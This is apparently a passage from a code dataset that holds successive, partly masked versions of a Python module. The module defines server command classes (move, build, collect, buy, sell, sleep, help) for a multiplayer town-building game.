self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], 
BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building 
= self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. 
Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, 
self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = 
podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-3": "<mask token>\n\n\nclass MovePlayerCommand(ServerCommand):\n <mask token>\n <mask token>\n\n def __repr__(self):\n msg = 'Move ServerCommand : {}'.format(self._direction)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.\n check_result)\n AvailableCheck(player).check(self.check_result)\n for tile in self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += 'tile {} not in town'.format(tile)\n return\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result)\n\n def _do(self):\n x_dest, y_dest = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = 'move'\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) ->tuple:\n movement_matrix = {}\n movement_matrix['left'] = -1, 0\n movement_matrix['right'] = +1, 0\n movement_matrix['up'] = 0, -1\n movement_matrix['down'] = 0, +1\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n bg_multiplicator = background.move_multiplicator\n x_dest = player.x + movement_matrix[self._direction][0\n ] * bg_multiplicator * player.velocity\n y_dest = player.y + movement_matrix[self._direction][1\n ] * bg_multiplicator * player.velocity\n return x_dest, y_dest\n\n def _get_tiles_coordinates_dict(self):\n x_dest, y_dest = self.tile_dest\n tiles_coordinates_dict = {'topleft': (math.floor(x_dest), math.\n floor(y_dest)), 'topright': (math.floor(x_dest + 0.99), math.\n floor(y_dest)), 'bottomleft': (math.floor(x_dest), math.floor(\n y_dest + 0.99)), 'bottomright': (math.floor(x_dest + 0.99),\n math.floor(y_dest + 0.99))}\n return 
tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) ->MovePlayerCommand:\n return cls(json_dict['direction'])\n <mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.backgrounds:\n self.check_result += 'tile {} not in town'.format(self._tile)\n return\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.\n check_result)\n if self._tile in self.town.buildings:\n self.check_result += (\"Can't build {} : {} already built on {}\"\n .format(self._building_name, self.town.buildings[self._tile\n ].name, self._tile))\n\n def _do(self):\n self.town.set_building(BuildingFactory.create_building_by_name(self\n ._building_name), self._tile)\n\n def __repr__(self):\n msg = 'Build ServerCommand : {} in {}'.format(self._building_name,\n self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = 
self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n 
building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return 
json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n 
building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = 
SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. 
Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return 
msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-4": "<mask token>\n\n\nclass MovePlayerCommand(ServerCommand):\n <mask token>\n\n def __init__(self, direction: str):\n ServerCommand.__init__(self)\n self._direction = direction\n\n def __repr__(self):\n msg = 'Move ServerCommand : {}'.format(self._direction)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.\n check_result)\n AvailableCheck(player).check(self.check_result)\n for tile in self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += 'tile {} not in town'.format(tile)\n return\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result)\n\n def _do(self):\n x_dest, y_dest = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = 'move'\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) ->tuple:\n movement_matrix = {}\n movement_matrix['left'] = -1, 0\n movement_matrix['right'] = +1, 0\n movement_matrix['up'] = 0, -1\n movement_matrix['down'] = 0, +1\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n bg_multiplicator = background.move_multiplicator\n x_dest = player.x + movement_matrix[self._direction][0\n ] * bg_multiplicator * player.velocity\n y_dest = player.y + movement_matrix[self._direction][1\n ] * bg_multiplicator * player.velocity\n return x_dest, y_dest\n\n def _get_tiles_coordinates_dict(self):\n x_dest, y_dest = self.tile_dest\n tiles_coordinates_dict = {'topleft': (math.floor(x_dest), math.\n floor(y_dest)), 'topright': (math.floor(x_dest + 0.99), math.\n floor(y_dest)), 'bottomleft': (math.floor(x_dest), math.floor(\n y_dest + 0.99)), 'bottomright': 
(math.floor(x_dest + 0.99),\n math.floor(y_dest + 0.99))}\n return tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) ->MovePlayerCommand:\n return cls(json_dict['direction'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'move'\n json_dict['direction'] = self._direction\n return json_dict\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.backgrounds:\n self.check_result += 'tile {} not in town'.format(self._tile)\n return\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.\n check_result)\n if self._tile in self.town.buildings:\n self.check_result += (\"Can't build {} : {} already built on {}\"\n .format(self._building_name, self.town.buildings[self._tile\n ].name, self._tile))\n\n def _do(self):\n self.town.set_building(BuildingFactory.create_building_by_name(self\n ._building_name), self._tile)\n\n def __repr__(self):\n msg = 'Build ServerCommand : {} in {}'.format(self._building_name,\n self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = 
self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, 
self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n 
